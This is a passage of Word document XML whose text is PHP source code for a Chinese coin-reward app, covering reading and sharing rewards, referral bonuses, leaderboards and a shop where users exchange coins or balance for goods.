      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>已放入你的账户</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;br&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>明天再分享可获得</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$money.'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1716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BD7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194E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E50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4C0C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fenxiang_2_s1']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A88A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文章分享第三方平台奖励金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47965B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Db::name('yaoqing_records')-&gt;where(['uid'=&gt;$s1,'content'=&gt;$content])-&gt;whereTime('time','today')-&gt;value('uid');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2E6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5EDCF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yaoqing['jinbi_fenxiang_2_s1'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F418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609292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7203B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13EFD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72961A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038D4D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E15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071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DCB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8C3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money_jindu'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEEA2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jindu_2']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E7B1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阅读收益奖励金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63866D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uid,'content'=&gt;$content])-&gt;whereTime('time','today')-&gt;count();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3729C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 &lt; $yaoqing['money_jindu_num']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EB8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rand(1,$yaoqing['jinbi_jindu_2']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD43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35006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6AB05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0A8812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214CF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20754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707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D101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jinbi'=&gt;$money]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093AD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5C5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0']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE42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3C3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E62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jinbi_jindu_2_s1']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B830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uid:'.$uid.'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>徒弟阅读收益奖励金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1516F6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yaoqing_records')-&gt;where(['uid'=&gt;$s1,'content'=&gt;$content])-&gt;whereTime('time','today')-&gt;count();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CEC0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 &lt; $yaoqing['money_jindu_num']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759A34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rand(1,$yaoqing['jinbi_jindu_2_s1']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D5E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240A3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36B7E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4951FB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691FD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05002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09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BB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E6B5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DA2C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jinbi_jindu_2_s1_s'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F0DE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is-&gt;baoxiangConfigJinbis(input('data'));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0896FB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3E18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357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ihang(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3D5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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F138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1A8287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type']=0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA07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data']=0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F74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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5197E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b','a.uid = b.id'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2957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YAOQING__ c','c.uid = b.id']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69198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C90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_records')-&gt;alias('a')-&gt;join($join)-&gt;where($where)-&gt;whereTime('time','week')-&gt;field('sum(a.money) as money_num,b.id,b.nickname,b.mobile,c.tudi_num')-&gt;group('a.uid')-&gt;order('money_num desc')-&gt;limit(100)-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215BA3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3930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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A02C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b','a.uid = b.id'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A06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E4A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yaoqing')-&gt;alias('a')-&gt;join($join)-&gt;field('b.id,b.nickname,b.mobile,a.tudi_num,a.money_num')-&gt;order('a.money_num desc')-&gt;limit(100)-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D75A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BE1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25D2D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nickname']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C701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nickname']=_username($v);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7F5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1498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money']=_money($v['money_num']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1AC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4E1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3A083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BF42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yesterday(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C626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this-&gt;member['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FDDE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0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444980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ata']=0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CB6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b::name('yaoqing_records')-&gt;where($where)-&gt;whereTime('time','yesterday')-&gt;sum('money');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60688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1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25747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Db::name('yaoqing_records')-&gt;where($where)-&gt;whereTime('time','yesterday')-&gt;sum('money');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B640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a'=&gt;_money($a),'b'=&gt;$b]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC5D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AF60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ll(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A26D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_typeid')-&gt;field('id,title')-&gt;where(['hide'=&gt;1])-&gt;cache(_cache('db'))-&gt;order('des desc,id asc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA92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3B671E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list=Db::name('shoplist')-&gt;where(['typeid'=&gt;$v['id'],'hide'=&gt;1])-&gt;cache(_cache('db'))-&gt;order('des </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>desc,id desc')-&gt;field('id,title,image,jinbi,money')-&gt;limit(6)-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1C68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shoplist as $ks =&gt; $vs) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D2E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list[$ks]['jinbi']=$vs['jinbi'].'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F63C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list[$ks]['money']=_money($vs['money']).'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>元</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517DD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list[$ks]['image']=_imgUrl().$vs['image'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643300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9C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shoplist;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598BC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D52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952AF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26E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llList(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628B6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18A6F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typeid/d')){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C9E6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input('typeid/d');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A12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47CD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gt;field('id,title,image,jinbi,money')-&gt;where($where)-&gt;cache(_cache('db'))-&gt;order('des desc,id desc')-&gt;paginate()-&gt;toarray();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B06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7B37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jinbi']=$v['jinbi'].'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF62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money']=_money($v['money']).'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>元</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBEF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_imgUrl().$v['image'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53258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31CD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E9B8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E00D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llView(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117CD7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id/d');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6D6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gt;where(['hide'=&gt;1,'id'=&gt;$id])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4A8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decode($data['images'],true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48259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data['images'] as $v){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6516C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imgUrl().$v;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369934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8BC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images;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43250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oney']=_money($data['money']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E18B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_imgUrl().$data['image'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155C31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shoplist')-&gt;where('id',$id)-&gt;setInc('click');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE353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lick']=$data['click']+1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F85D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ext'] = str_replace("/public/uploads/",config()['appConfig']['url']."/public/uploads/",$data['text']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E166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1BE8DD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9554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llPay(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED41F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id=input('shopid/d');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABC01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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398A8A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input('xingming');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E43B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input('mobile');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CBF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zhi=input('dizhi');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A51B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ipay=input('alipay');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102A1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A94A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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>姓名</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'              =&gt;       'require',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7501AB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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>手机号码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'         =&gt;      'require|number',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2EC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izhi|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>详细地址</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'         =&gt;      'require',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C32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ipay|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>支付宝号码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'         =&gt;      'require',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416393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r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>兑换方式</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'         =&gt;      'require|number|in:1,2',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241FC4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C4A1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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6DE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             =&gt;      $xingming,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56011B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gt;      $mobile,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03934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zhi'             =&gt;      $dizhi,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D78A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ipay'             =&gt;      $alipay,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE42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1AC62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5558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B2B8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validate-&gt;getError()]));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF38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84E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isMobile($mobile)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4146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手机不正确</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19291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4EC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tern="/([a-z0-9]*[-_.]?[a-z0-9]+)*@([a-z0-9]*[-_]?[a-z0-9]+)+[.][a-z]{2,3}([.][a-z]{2})?/i";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC74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reg_match($pattern,$alipay)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E44C0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_isMobile($alipay)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA26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支付宝号码不正确</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286C3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698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E0C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Db::name('shoplist')-&gt;where(['id'=&gt;$shopid,'hide'=&gt;1])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766DF2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hop){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730A3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商品不存在或已下架</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699BE2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484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tval($shop['num'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B819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商品存库不足</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562B77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9FB4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1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DCD2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jinbi'] || $shop['jinbi'] &gt; $this-&gt;member['yaoqing']['jinbi']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3385E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金币不足</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F70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7565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81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2){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9342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money'] || $shop['money'] &gt; $this-&gt;member['yaoqing']['money']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B64CE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零钱不足</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2545C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1753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4CB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01DA57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305B6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type==1 ? 'A' : 'B').rand(1000000,9999999);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E036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shoplist_records')-&gt;insert([</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23474E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pid'    =&gt;  $shop['id'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A1A9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       =&gt;  1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FCC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48F2E8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this-&gt;member['id'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D50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6DC81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gt;  $code,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFD0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p'        =&gt;  $ip,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198974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shop['money'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49527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  =&gt;  $xingming,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFF2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zhi'     =&gt;  $dizhi,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64180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gt;  $mobile,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097187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ipay'    =&gt;  $alipay</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63777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564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JInbiMoney=$type==1 ? 'jinbi' : 'money';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F42C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id:'.$shop['id'].($type==1 ? ' </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">' : ' </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>零钱</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>').'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>商品兑换</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB96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47AED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this-&gt;member['id'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2B8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JInbiMoney =&gt;  [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B20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shop[$typeJInbiMoney],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F008B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42E38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1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB833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9030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A9E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shoplist')-&gt;where(['id'=&gt;$shopid])-&gt;setDec('num');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323043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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>兑换成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00ACA6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8EF1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allOrder(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C93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this-&gt;member['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B24C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7148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SHOPLIST__ b','a.shopid = b.id'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F4A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33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shoplist_records')-&gt;alias('a')-&gt;join($join)-&gt;where($where)-&gt;field('a.shopid,a.data,a.code,a.time,a.money,a.kuaidi,a.danhao,a.data,a.type,a.num,b.title,b.image')-&gt;order('a.time desc')-&gt;paginate()-&gt;toarray();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8B8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data['data'] as $k =&gt; $v){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1DB8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_imgUrl().$v['image'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4CA5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ype']==2){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7349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money']=_money($v['money']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD77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766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Y-m-d H:i:s',$v['time']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66700C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0=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>等待平台发货</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',1=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>已发货</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',2=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>已完成</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AEC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f']=$f[$v['data']];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1210DF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53D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27964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494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nwu(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544A7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46C0F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renwu_typeid')-&gt;where(['hide'=&gt;1])-&gt;order('des desc,id asc')-&gt;cache(_cache('db'))-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736E0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601FF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Db::name('renwu')-&gt;where(['typeid'=&gt;$v['id'],'hide'=&gt;1])-&gt;cache(_cache('db'))-&gt;order('des desc,id asc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461720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img']=_imgUrl().$v['img'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003E0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k]['data'] as $ks =&gt; $vs) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67492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money']='+'.$vs['money'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B81E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vs['url']=='video_win' || $vs['url']=='weitoutiao_win' || $vs['url']=='xiaoshipin_win' || $vs['url']=='member_win'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A04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_index_win(\''.$vs['url'].'\')';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB22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s['url']=='index'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767D2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_hone()';</w:t>
      </w:r>
    </w:p>
